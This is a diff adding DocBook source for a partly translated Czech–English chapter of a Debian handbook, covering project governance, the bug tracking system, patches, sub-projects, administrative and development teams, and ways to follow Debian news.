+			 <indexterm>
+				<primary>McIntyre, Steve</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Zacchiroli, Stefano</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Nussbaum, Lucas</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Dogguy, Mehdi</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Lamb, Chris</primary>
+			</indexterm>
+			 <para>
+				Since its inception, the project has been successively led by Ian Murdock, Bruce Perens, Ian Jackson, Wichert Akkerman, Ben Collins, Bdale Garbee, Martin Michlmayr, Branden Robinson, Anthony Towns, Sam Hocevar, Steve McIntyre, Stefano Zacchiroli, Lucas Nussbaum, Mehdi Dogguy and Chris Lamb.
+			</para>
+			 <indexterm>
+				<primary>technická komise</primary>
+			</indexterm>
+			 <para>
+				Stanovy rovněž definují “technickou komisi”. Hlavní úlohou této komise je rozhodovat v technických otázkách, pokud se zúčastnění vývojáři mezi sebou nedohodnou. Jinak má tato komise roli rádce pro vývojáře, kterému se nepodařilo učinit rozhodnutí, za které má odpovědnost. Je důležité poznamenat, že se zapojí pouze v případě, kdy je k tomu jednou ze zainteresovaných stran vyzvána.
+			</para>
+			 <indexterm>
+				<primary>tajemník projektu</primary>
+			</indexterm>
+			 <para>
+				A konečně stanovy definují pozici “tajemníka projektu”, který má na starosti organizaci hlasování v souvislosti s různými volbami a obecnými usneseními.
+			</para>
+			 <para>
+				The “general resolution” procedure is fully detailed in the constitution, from the initial discussion period to the final counting of votes. The most interesting aspect of that process is that when it comes to an actual vote, developers have to rank the different ballot options between them and the winner is selected with a <ulink url="https://en.wikipedia.org/wiki/Condorcet_method">Condorcet method</ulink> (more specifically, the Schulze method). For further details see: <ulink type="block" url="http://www.debian.org/devel/constitution.en.html" />
+			</para>
+			 <indexterm>
+				<primary>obecné usnesení</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>hlasování</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>KULTURA</emphasis> Flamewar, diskuse, která zachytí požár</title>
+			 <indexterm>
+				<primary>flamewar</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>horká debata</primary>
+			</indexterm>
+			 <para>
+				“Flamewar” je mimořádně vášnivá debata, která často končí s lidmi napadajícími se navzájemm, jakmile všechny rozumné argumentace byly vyčerpána na obou stranách. Některá témata jsou častěji předmětem polemik než ostatní (volba textového editoru, “dáváte přednost <command>vi</command> nebo <command>emacsu</command>?”, je staré oblíbené). Tyto věci často vyvolávají velmi rychlé výměny emailů v důsledku velkého počtu lidí se stanoviskem k této záležitosti (všichni) a velmi osobní povahu takových námitek.
+			</para>
+			 <para>
+				Obecně, nic zvlášť užitečného z takových diskusí nevzejde; Všeobecné doporučení je zůstat mimo takové debaty a asi rychle prolistovat jejich obsah, protože jejich čtení v plném rozsahu by bylo příliš časově náročné.
+			</para>
+			 </sidebar> <para>
+				I když stanovy vytváří zdání demokracie, denní realita je zcela odlišná: Debian přirozeně dodržuje pravidla svobodného softwaru do-ocracie: ten, kdo dělá věci rozhoduje, jak je dělat. Mnoho času může být vyplýtváno debatováním o jednotlivých přínosech různých cest, jak přistupovat k problému; zvolené řešení bude to první, která je obojí - funkční a uspokojující..., které vyjde z času, který do něj způsobilá osoba vložila.
+			</para>
+			 <para>
+				To je jediný způsob, jak si vysloužit ostruhy: udělat něco užitečného a ukázat, že se pracovalo dobře. Mnoho “administrativních” týmů Debianu působí za pomocí kooptace, upřednostňující dobrovolníky, kteří již efektivně přispěli a prokázali svou schopnost. Veřejná podstata práce těchto týmů umožňuje novým přispěvatelům pozorovat a začít pomáhat bez zvláštních privilegií. Proto je Debian často popisován jako “meritokracie”.
+			</para>
+			 <sidebar> <title><emphasis>KULTURA</emphasis> Meritokracie, vláda znalostí</title>
+			 <indexterm>
+				<primary>meritokracie</primary>
+			</indexterm>
+			 <para>
+				Meritokracie je forma vlády, v níž je autorita vykonávána těmi, kteří mají největší zásluhy. Pro Debian, jsou zásluhy měřítkem kompetence, která je sama o sobě, posuzována sledováním dřívějších činností jednoho nebo více lidí v rámci projektu (Stefano Zacchiroli, bývalý vedoucí projektu, hovoří o “do-okracii”, což znamená “moc pro ty, kteří věci dělají”). Jejich prostá existence dokazuje určitou úroveň kompetence; jejich úspěchy obecně je svobodný software, s dostupným zdrojovým kódem, který může být snadno přezkoumán ostatními k posouzení jejich kvality.
+			</para>
+			 </sidebar> <para>
+				Tato účinná operativní metoda zaručuje kvalitu přispěvatelů v “klíčových” týmech Debianu. Tato metoda není v žádném případě dokonalá a občas se vyskytnou tací, kteří nepřijmou tento způsob fungování. Výběr vývojářů přijatých do týmů se může zdát trochu svévolný, nebo dokonce nespravedlivý. Navíc, ne každý má stejnou představu o službách očekávaných od těchto týmů. Pro někoho je nepřijatelné muset čekat osm dní pro zahrnutí nového debianovského balíčku, zatímco ostatní budou trpělivě čekat tři týdny bez problémů. Jako takové, se pravidelně vyskytují stížnosti od těch nespokojených na “kvalitu služeb” některých týmů.
+			</para>
+			 <sidebar> <title><emphasis>KOMUNITA</emphasis> Začleňování nových správců</title>
+			 <indexterm>
+				<primary>správce</primary>
+				<secondary>nový správce</secondary>
+			</indexterm>
+			 <para>
+				Tým, který má na starosti přijímání nových vývojářů, je pravidelně nejvíce kritizován. Je třeba uznat, že v průběhu let se debianovský projekt stává stále náročnějším pro vývojáře, které bude přijímat. Někteří lidé v tom mohou vidět nespravedlnost, musíme ale přiznat, že to, co se jevilo jako malá výzva na začátku se stalo výzvou mnohem větší ve společenství čítajícím více než 1 000 lidí, pokud jde o zajištění kvality a integrity všeho, co Debian produkuje pro své uživatele.
+			</para>
+			 <indexterm>
+				<primary>DAM</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Account manažeři Debianu</primary>
+			</indexterm>
+			 <para>
+				Dále, postup přijetí je ukončen přezkoumáním kandidatury malým týmem - account manažery Debianu. Tito manažeři jsou také obzvláště vystaveni kritice, protože mají konečné slovo v přijetí nebo odmítnutí dobrovolníka v rámci komunity vývojářů Debianu. V praxi, musí někdy zpozdit přijetí osoby, aby se dozvěděli více o činnosti projektu. Člověk může samozřejmě přispívat k Debianu i před přijetím za oficiálního vývojářáře tím, že je zaštiťován vývojáři současnými.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Aktivní role uživatelů</title>
+			 <para>
+				Jeden by mohl nadnést, zda je vůbec důležité zmiňovat uživatele zároveň s těmi, kteří pracují v rámci projektu Debian, ale odpověď je definitivní ano: hrají důležitou roli v projektu. Někteří uživatelé jsou daleko od toho být nazýváni “pasivními”, někteří spouštějí vývojové verze Debianu a pravidelně zakládají hlášení o chybách a upozorňují na problémy. Jiní jdou ještě dál a předkládají nápady pro zlepšení tím, že podávají hlášení o chybě s úrovní závažnosti “přání”, nebo dokonce předkládají opravy zdrojového kódu nazvané “patche” (viz postranní informace <xref linkend="sidebar.patch" />).
+			</para>
+			 <sidebar id="sidebar.bts"> <title><emphasis>NÁSTROJ</emphasis> Systém na sledování chyb</title>
+			 <indexterm>
+				<primary>systém</primary>
+				<secondary>Systém na sledování chyb</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>BTS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Systém an sledování chyb (BTS)</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><literal>bugs.debian.org</literal></primary>
+			</indexterm>
+			 <para>
+				Sledovcí systém chyb Debianu (Debian BTS) je používán velkými částmi projektu. Veřejná část (webové rozhraní) umožňuje uživatelům zobrazit všechny ohlášené chyby, s možností zobrazit seřazený seznam chyb vybraných podle různých kritérií, jako například: dotčený balíček, závažnost, stav, adresa ohlašovatele, adresa zodpovědného správce, tag, apod. Je také možné procházet celý historický výpis všech diskusí týkajících se jednotlivých chyb.
+			</para>
+			 <para>
+				Pod povrchem je Debian BTS založen na e-mailu: všechny informace, které uchovává, pocházejí ze zpráv odeslaných různými osobami. Všechny e-maily odeslané na <email>12345@bugs.debian.org</email> budou tedy přiřazeny k historii chyby číslo 12345. Oprávněné osoby mohou chybu “uzavřítٌ” napsáním zprávy popisující důvody rozhodnutí o uzavření na <email>12345-Done@bugs.debian.org</email> (chyba je uzavřena, pokud je uvedený problém vyřešen nebo již není relevantní). Nová chyba je hlášena zasláním e-mailu na <email>Submit@bugs.debian.org</email> podle konkrétního formátu, který identifikuje dotyčný balíček. Adresa <email>Control@bugs.debian.org</email> umožňuje editaci všech “meta-informací” vztahujících se k chybě.
+			</para>
+			 <para>
+				The Debian BTS has other functional features, as well, such as the use of tags for labeling bugs. For more information, see <ulink type="block" url="https://www.debian.org/Bugs/" />
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>SLOVNÍČEK</emphasis> Závažnost chyby</title>
+			 <indexterm>
+				<primary>závažnost</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>chyba</primary>
+				<secondary>závažnost</secondary>
+			</indexterm>
+			 <para>
+				Závažnost chyby formálně přiřazuje reportovanému problému stupeň důležitosti. V praxi, ne všechny chyby mají stejnou důležitost; například překlep na stránce manuálu se nemůže rovnat bezpečnostnímu riziku v softwaru serveru.
+			</para>
+			 <para>
+				Debian uses an extended scale to describe the severity of a bug. Each level is defined precisely in order to facilitate the selection thereof. <ulink type="block" url="https://www.debian.org/Bugs/Developer#severities" />
+			</para>
+			 </sidebar> <para>
+				Additionally, numerous satisfied users of the service offered by Debian like to make a contribution of their own to the project. As not everyone has appropriate levels of expertise in programming, they may choose to assist with the translation and review of documentation. There are language-specific mailing lists to coordinate this work. <ulink type="block" url="https://lists.debian.org/i18n.html" /> <ulink type="block" url="https://www.debian.org/international/" />
+			</para>
+			 <sidebar> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Co je to i18n a l10n?</title>
+			 <indexterm>
+				<primary>internacionalizace</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>lokalizace</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>i18n</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>l10n</primary>
+			</indexterm>
+			 <para>
+				“i18n” a “l10n” jsou zkratky slov “internacionalizace” a “lokalizace”, respektive, ponechání prvního a posledního písmena z každého slova a počet písmen uprostřed.
+			</para>
+			 <para>
+				“Internacionalizování” programu spočívá v jeho modifikaci, kdy může být přeložen (lokalizován). To obnáší částečné přepsání programu původně napsaného pro fungování v jednom jazyku za účelem možnosti jeho otevření ve všech jazycích.
+			</para>
+			 <para>
+				“Lokalizace” programu spočívá v překladu původních zpráv (často v angličtině) do jiného jazyka. Abychom toho dosáhli, musí být již program internacializován.
+			</para>
+			 <para>
+				Abychom to shrnuli, internacionalizace připravuje software pro překlad, který je potom spuštěn lokalizací.
+			</para>
+			 </sidebar> <sidebar id="sidebar.patch"> <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Patch, způsob zasílání oprav</title>
+			 <indexterm>
+				<primary><command>patch</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>patch</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>diff</command></primary>
+			</indexterm>
+			 <para>
+				Patch je soubor popisující změny, které mají být provedeny na jednom nebo více odkazovaných souborech. Konkrétně, obsahuje seznam řádků k odstranění nebo přidání do kódu, stejně jako (někdy) řádky odebrané z referenčního textu, nahrazující modifikace v kontextu (umožňující identifikaci umístění změn, pokud čísla řádlů byla změněna).
+			</para>
+			 <para>
+				Nástroj používaný pro uplatnění modifikací předávaných v takovém souboru je jednoduše nazýván <command>patch</command>. nástroj, který jej vytváří se jmenuje <command>diff</command> a používá se takto:
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>diff -u file.old file.new &gt;file.patch</userinput></screen>
+			 <para>
+				Soubor <filename>file.patch</filename> obsahuje instrukce pro provedení obsahových změn <filename>file.old</filename> na <filename>file.new</filename>. Můžeme jej poslat někomu, kdo jej dokáže použít k vytvoření <filename>file.new</filename> z těch ostatních dvou, tímto způsobem:
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>patch -p0 file.old &lt;file.patch</userinput></screen>
+			 <para>
+				Soubor, <filename>file.old</filename>, je nyní identický s <filename>file.new</filename>.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>NÁSTROJ</emphasis> Nahlásit chybu <command>reportbugem</command></title>
+			 <indexterm>
+				<primary><command>reportbug</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>chyba</primary>
+				<secondary>nahlásit chybu</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>nahlásit chybu</primary>
+			</indexterm>
+			 <para>
+				The <command>reportbug</command> tool facilitates sending bug reports on a Debian package. It helps making sure the bug in question hasn't already been filed, thus preventing redundancy in the system. It reminds the user of the definitions of the severity levels, for the report to be as accurate as possible (the developer can always fine-tune these parameters later, if needed). It helps writing a complete bug report without the user needing to know the precise syntax, by writing it and allowing the user to edit it. This report will then be sent via an e-mail server (by default, a remote one run by Debian, but <command>reportbug</command> can also use a local server).
+			</para>
+			 <para>
+				Tento nástroj se nejdříve zaměřuje na vývojové verze, což je místo, kde jsou chyby opraveny. V praxi nejsou chyby ve stabilní verzi Debianu vítány, s velmi málo vyjímkami pro bezpečnostní aktualizace nebo důležité aktualizace (pokud, například, balíček vůbec nefunguje). Náprava menší chyby v debianovském balíčku musí tak počkat na další stabilní verzi.
+			</para>
+			 </sidebar> <para>
+				Všechny tyto příspěvkové mechanismy se stávají více efektivními díky chování uživatelů. Uživatelé jsou daleko tomu být skupinou izolovaných osob, jsou naopak komunitou, kde se spousta výměnných činností děje. Obzvláště sledujeme obdivuhodnou aktivitu na diskuzních emailových seznamech uživatelů, <email>debian-user@lists.debian.org</email> (<xref linkend="solving-problems" /> se tomu detailněji věnuje).
+			</para>
+			 <para>
+				Nejen, že uživatelé pomáhají sobě (i ostatním) s technickými věcmi, které se jich bezprostředně týkají, ale také diskutují o nejlepších způsobech, jak přispět k debianovskému projektu a posunout jej dál - diskutování, které často vede k návrhům na vylepšení.
+			</para>
+			 <para>
+				Protože Debian nevydává žádné prostředky na žádnou sebepropagační kampaň, jeho uživatelé hrají podstatnou roli v jeho rozšiřování a tím upevňování jeho věhlasu prostřednictvím osobních rozhovorů apod.
+			</para>
+			 <para>
+				This method functions quite well, since Debian fans are found at all levels of the free software community: from install parties (workshops where seasoned users assist newcomers to install the system) organized by local LUGs or “Linux User Groups”, to association booths at large tech conventions dealing with Linux, etc.
+			</para>
+			 <para>
+				Volunteers make posters, brochures, stickers, and other useful promotional materials for the project, which they make available to everyone, and which Debian provides freely on its website and on its wiki: <ulink type="block" url="https://www.debian.org/events/material" />
+			</para>
+
+		</section>
+		 <section>
+			<title>Týmy a podprojekty</title>
+			 <para>
+				Debian byl od samého počátku organizován kolem konceptu zdrojových balíčků, každý se svým správcem nebo skupinou správců. Časem se vytvořilo hodně pracovních týmů, zabezpečujících administrativu infrastruktury, řízení úkolů nepatřících k žádnému konlrétnímu balíčku (zajišťování kvality, zásady Debianu, instalace, apod.), spolu s posledními týmy, které vyrostly kolem podprojektů.
+			</para>
+			 <section id="sect.sub-projects">
+				<title>Současné podprojekty Debianu</title>
+				 <para>
+					To each their own Debian! A sub-project is a group of volunteers interested in adapting Debian to specific needs. Beyond the selection of a sub-group of programs intended for a particular domain (education, medicine, multimedia creation, etc.), sub-projects are also involved in improving existing packages, packaging missing software, adapting the installer, creating specific documentation, and more.
+				</para>
+				 <sidebar> <title><emphasis>VOCABULARY</emphasis> Sub-project and derivative distribution</title>
+				 <indexterm>
+					<primary>dílčí projekt</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>derivative distribution</primary>
+				</indexterm>
+				 <para>
+					The development process for a derivative distribution consists in starting with a particular version of Debian and making a number of modifications to it. The infrastructure used for this work is completely external to the Debian project. There isn't necessarily a policy for contributing improvements. This difference explains how a derivative distribution may “diverge” from its origins, and why they have to regularly resynchronize with their source in order to benefit from improvements made upstream.
+				</para>
+				 <para>
+					On the other hand, a sub-project can not diverge, since all the work on it consists of directly improving Debian in order to adapt it to a specific goal.
+				</para>
+				 <para>
+					The most known distribution derived from Debian is, without a doubt, Ubuntu, but there are many. See <xref linkend="derivative-distributions" /> to learn about their particularities and their positioning in relationship to Debian.
+				</para>
+				 </sidebar> <para>
+					Here is a small selection of current sub-projects:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							Debian-Junior, by Ben Armstrong, offering an appealing and easy to use Debian system for children;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Debian-Edu, by Petter Reinholdtsen, focused on the creation of a specialized distribution for the academic world;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Debian Med, by Andreas Tille, dedicated to the medical field;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Debian Multimedia which deals with audio and multimedia work;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Debian-Desktop which focuses on the desktop and coordinates artwork for the default theme;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Debian GIS which takes care of Geographical Information Systems applications and users;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Debian Accessibility, finally, improving Debian to match the requirements of people with disabilities.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					This list will most likely continue to grow with time and improved perception of the advantages of Debian sub-projects. Fully supported by the existing Debian infrastructure, they can, in effect, focus on work with real added value, without worrying about remaining synchronized with Debian, since they are developed within the project.
+				</para>
+
+			</section>
+			 <section>
+				<title>Administrative Teams</title>
+				 <para>
+					Most administrative teams are relatively closed and recruit only by cooptation. The best means to become a part of one is to intelligently assist the current members, demonstrating that you have understood their objectives and methods of operation.
+				</para>
+				 <para>
+					The ftpmasters are in charge of the official archive of Debian packages. They maintain the program that receives packages sent by developers and automatically stores them, after some checks, on the reference server (<literal>ftp-master.debian.org</literal>).
+				</para>
+				 <para>
+					They must also verify the licenses of all new packages, in order to ensure that Debian may distribute them, prior to including them in the corpus of existing packages. When a developer wishes to remove a package, they address this team through the bug tracking system and the <emphasis>ftp.debian.org</emphasis> “pseudo-package”.
+				</para>
+				 <indexterm>
+					<primary>ftpmaster</primary>
+				</indexterm>
+				 <sidebar> <title><emphasis>VOCABULARY</emphasis> The pseudo-package, a monitoring tool</title>
+				 <indexterm>
+					<primary>pseudo-package</primary>
+				</indexterm>
+				 <para>
+					The bug tracking system, initially designed to associate bug reports with a Debian package, has proved very practical to manage other matters: lists of problems to be resolved or tasks to manage without any link to a particular Debian package. The “pseudo-packages” allow, thus, certain teams to use the bug tracking system without associating a real package with their team. Everyone can, thus, report issues that needs to be dealt with. For instance, the BTS has a <emphasis>ftp.debian.org</emphasis> entry that is used to report and track problems on the official package archive or simply to request removal of a package. Likewise, the <emphasis>www.debian.org</emphasis> pseudo-package refers to errors on the Debian website, and <emphasis>lists.debian.org</emphasis> gathers all the problems concerning the mailing lists.
+				</para>
+				 </sidebar> <sidebar id="sidebar.gitlab"> <title><emphasis>TOOL</emphasis> GitLab, Git repository hosting and much more</title>
+				 <indexterm>
+					<primary><literal>salsa.debian.org</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>GitLab</primary>
+				</indexterm>
+				 <para>
+					A GitLab instance, known as <literal>salsa.debian.org</literal>, is used by Debian to host the Git packaging repositories but this software offers much more than simple hosting and Debian contributors have been quick to leverage the continuous integration features (running tests, or even building packages, on each push). Debian contributors also benefit from a cleaner contribution workflow thanks the well understood merge request process (similar to GitHub's pull requests).
+				</para>
+				 <para>
+					GitLab replaced FusionForge (which was running on a service known as <literal>alioth.debian.org</literal>) for collaborative package maintainance. This service is administered by Alexander Wirt, Bastian Blank and Jörg Jaspert. <ulink type="block" url="https://salsa.debian.org/" /> <ulink type="block" url="https://wiki.debian.org/Salsa/Doc" />
+				</para>
+				 </sidebar> <para id="dsa-team">
+					The <emphasis>Debian System Administrators</emphasis> (DSA) team (<email>debian-admin@lists.debian.org</email>), as one might expect, is responsible for system administration of the many servers used by the project. They ensure optimal functioning of all base services (DNS, Web, e-mail, shell, etc.), install software requested by Debian developers, and take all precautions in regards to security. <ulink type="block" url="https://dsa.debian.org" />
+				</para>
+				 <indexterm>
+					<primary><emphasis>debian-admin</emphasis></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>DSA (Debian System Administrators)</primary>
+				</indexterm>
+				 <sidebar> <title><emphasis>TOOL</emphasis> Debian Package Tracker</title>
+				 <indexterm>
+					<primary>package tracking system</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>system</primary>
+					<secondary>package tracking system</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>Debian Package Tracker</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>tracker</primary>
+					<secondary>Debian Package Tracker</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>package</primary>
+					<secondary>Debian Package Tracker</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>PTS</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>DDPO</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Debian Developer's Packages Overview</primary>
+				</indexterm>
+				 <para>
+					This is one of Raphaël's creations. The basic idea is, for a given package, to centralize as much information as possible on a single page. Thus, one can quickly check the status of a program, identify tasks to be completed, and offer one's assistance. This is why this page gathers all bug statistics, available versions in each distribution, progress of a package in the <emphasis role="distribution">Testing</emphasis> distribution, the status of translations of descriptions and debconf templates, the possible availability of a new upstream version, notices of noncompliance with the latest version of the Debian Policy, information on the maintainer, and any other information that said maintainer wishes to include. <ulink type="block" url="https://tracker.debian.org/" />
+				</para>
+				 <para>
+					An e-mail subscription service completes this web interface. It automatically sends the following selected information to the list: bugs and related discussions, availability of a new version on the Debian servers, new translations available for proofreading, etc.
+				</para>
+				 <para>
+					Advanced users can, thus, follow all of this information closely and even contribute to the project, once they have got a good enough understanding of how it works.
+				</para>
+				 <para>
+					Another web interface, known as <emphasis>Debian Developer's Packages Overview</emphasis> (DDPO), provides each developer a synopsis of the status of all Debian packages placed under their charge. <ulink type="block" url="https://qa.debian.org/developer.php" />
+				</para>
+				 <para>
+					These two websites are tools developed and managed by the group responsible for quality assurance within Debian (known as Debian QA).
+				</para>
+				 <indexterm>
+					<primary>assurance</primary>
+					<secondary>quality assurance</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>quality</primary>
+					<secondary>assurance</secondary>
+				</indexterm>
+				 </sidebar> <para>
+					The <emphasis>listmasters</emphasis> administer the e-mail server that manages the mailing lists. They create new lists, handle bounces (delivery failure notices), and maintain spam filters (unsolicited bulk e-mail).
+				</para>
+				 <indexterm>
+					<primary>listmaster</primary>
+				</indexterm>
+				 <sidebar> <title><emphasis>CULTURE</emphasis> Traffic on the mailing lists: some figures</title>
+				 <indexterm>
+					<primary>lists</primary>
+					<secondary>mailing lists</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>mailing lists</primary>
+				</indexterm>
+				 <para>
+					The mailing lists are, without a doubt, the best testimony to activity on a project, since they keep track of everything that happens. Some statistics (from 2017) regarding our mailing lists speak for themselves: Debian hosts more than 250 lists, totaling 217,000 individual subscriptions. The 27,000 messages sent each month generate 476,000 e-mails daily.
+				</para>
+				 </sidebar> <para>
+					Each specific service has its own administration team, generally composed of volunteers who have installed it (and also frequently programmed the corresponding tools themselves). This is the case of the bug tracking system (BTS), the package tracker, <literal>salsa.debian.org</literal> (GitLab server, see sidebar <xref linkend="sidebar.gitlab" />), the services available on <literal>qa.debian.org</literal>, <literal>lintian.debian.org</literal>, <literal>buildd.debian.org</literal>, <literal>cdimage.debian.org</literal>, etc.
+				</para>
+
+			</section>
+			 <section>
+				<title>Development Teams, Transversal Teams</title>
+				 <para>
+					Unlike administrative teams, the development teams are rather widely open, even to outside contributors. Even if Debian does not have a vocation to create software, the project needs some specific programs to meet its goals. Of course, developed under a free software license, these tools make use of methods proven elsewhere in the free software world.
+				</para>
+				 <sidebar id="sidebar.git"> <title><emphasis>CULTURE</emphasis> Git</title>
+				 <indexterm>
+					<primary>Git</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>configuration management</primary>
+				</indexterm>
+				 <para>
+					Git is a tool for collaborative work on multiple files, while maintaining a history of modifications. The files in question are generally text files, such as a program's source code. If several people work together on the same file, <command>git</command> can only merge the alterations made if they were made to different portions of the file. Otherwise, these “conflicts” must be resolved by hand.
+				</para>
+				 <para>
+					Git is a distributed system where each user has a repository with the complete history of changes. Central repositories are used to download the project (<command>git clone</command>) and to share the work done with others (<command>git push</command>). The repository can contain multiple versions of the files but only one version can be worked on at a given time: it's called the working copy (it can be changed to point to another version with <command>git checkout</command>). Git can show you the modifications made to the working copy (<command>git diff</command>), can store them in the repository by creating a new entry in the versions history (<command>git commit</command>), can update the working copy to include modifications made in parallel by other users (<command>git pull</command>), and can record a particular configuration in the history in order to be able to easily extract it later on (<command>git tag</command>).
+				</para>
+				 <para>
+					Git makes it easy to handle multiple concurrent versions of a project in development without them interfering with each other. These versions are called <emphasis>branches</emphasis>. This metaphor of a tree is fairly accurate, since a program is initially developed on a common trunk. When a milestone has been reached (such as version 1.0), development continues on two branches: the development branch prepares the next major release, and the maintenance branch manages updates and fixes for version 1.0.
+				</para>
+				 <indexterm>
+					<primary>Version Control System (VCS)</primary>
+				</indexterm>
+				 <para>
+					Git is, nowadays, the most popular version control system but it is not the only one. Historically, CVS (Concurrent Versions System) was the first widely used tool but its numerous limitations contributed to the appearance of more modern free alternatives. These include, especially, <command>subversion</command> (<command>svn</command>), <command>git</command>, <command>bazaar</command> (<command>bzr</command>), and <command>mercurial</command> (<command>hg</command>). <ulink type="block" url="http://www.nongnu.org/cvs/" /> <ulink type="block" url="http://subversion.apache.org/" /> <ulink type="block" url="http://git-scm.com/" /> <ulink type="block" url="http://bazaar.canonical.com/" /> <ulink type="block" url="http://mercurial.selenic.com/" />
+				</para>
+				 <indexterm>
+					<primary><command>subversion</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>svn</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>git</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>bzr</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>hg</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>mercurial</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>cvs</command></primary>
+				</indexterm>
+				 </sidebar> <para>
+					Debian has developed little software of its own, but certain programs have assumed a starring role, and their fame has spread beyond the scope of the project. Good examples are <command>dpkg</command>, the Debian package management program (it is, in fact, an abbreviation of Debian PacKaGe, and generally pronounced as “dee-package”), and <command>apt</command>, a tool to automatically install any Debian package, and its dependencies, guaranteeing the consistency of the system after an upgrade (its name is an acronym for Advanced Package Tool). Their teams are, however, much smaller, since a rather high level of programming skill is required to gain an overall understanding of the operations of these types of programs.
+				</para>
+				 <para>
+					The most important team is probably that for the Debian installation program, <command>debian-installer</command>, which has accomplished a work of momentous proportions since its conception in 2001. Numerous contributors were needed, since it is difficult to write a single program able to install Debian on a dozen different architectures. Each one has its own mechanism for booting and its own bootloader. All of this work is coordinated on the <email>debian-boot@lists.debian.org</email> mailing list, under the direction of Cyril Brulebois. <ulink type="block" url="http://www.debian.org/devel/debian-installer/" /> <ulink type="block" url="http://joeyh.name/blog/entry/d-i_retrospective/" />
+				</para>
+				 <para>
+					The (very small) <command>debian-cd</command> program team has an even more modest objective. Many “small” contributors are responsible for their architecture, since the main developer can not know all the subtleties, nor the exact way to start the installer from the CD-ROM.
+				</para>
+				 <para>
+					Many teams must collaborate with others in the activity of packaging: <email>debian-qa@lists.debian.org</email> tries, for example, to ensure quality at all levels of the Debian project. The <email>debian-policy@lists.debian.org</email> list develops Debian Policy according to proposals from all over the place. The teams in charge of each architecture (<email>debian-<replaceable>architecture</replaceable>@lists.debian.org</email>) compile all packages, adapting them to their particular architecture, if needed.
+				</para>
+				 <para>
+					Other teams manage the most important packages in order to ensure maintenance without placing too heavy a load on a single pair of shoulders; this is the case with the C library and <email>debian-glibc@lists.debian.org</email>, the C compiler on the <email>debian-gcc@lists.debian.org</email> list, or Xorg on the <email>debian-x@lists.debian.org</email> (this group is also known as the X Strike Force).
+				</para>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.follow-debian-news">
+		<title>Follow Debian News</title>
+		 <para>
+			As already mentioned, the Debian project evolves in a very distributed, very organic way. As a consequence, it may be difficult at times to stay in touch with what happens within the project without being overwhelmed with a never-ending flood of notifications.
+		</para>
+		 <para>
+			If you only want the most important news about Debian, you probably should subscribe to the <email>debian-announce@lists.debian.org</email> list. This is a very low-traffic list (around a dozen messages a year), and only gives the most important announcements, such as the availability of a new stable release, the election of a new Project Leader, or the yearly Debian Conference. <ulink type="block" url="https://lists.debian.org/debian-announce/" />
+		</para>
+		 <indexterm>
+			<primary>Debian Project News</primary>
+		</indexterm>
+		 <para>
+			More general (and regular) news about Debian are sent to the <email>debian-news@lists.debian.org</email> list. The traffic on this list is quite reasonable too (usually around a handful of messages a month), and it includes the semi-regular “Debian Project News”, which is a compilation of various small bits of information about what happens in the project. <ulink type="block" url="https://lists.debian.org/debian-news/" />
+		</para>
+		 <sidebar> <title><emphasis>COMMUNITY</emphasis> The publicity team</title>
+		 <para>
+			Debian's official communication channels are managed by volunteers of the Debian publicity team. They are delegates of the Debian Project Leader and moderate news and announcements posted there. Many other volunteers contribute to the team, for example by writing articles for “Debian Project News” or by animating the microblogging service (<ulink url="https://micronews.debian.org/">micronews.debian.org</ulink>). <ulink type="block" url="https://wiki.debian.org/Teams/Publicity" />
+		</para>
+		 </sidebar> <para>
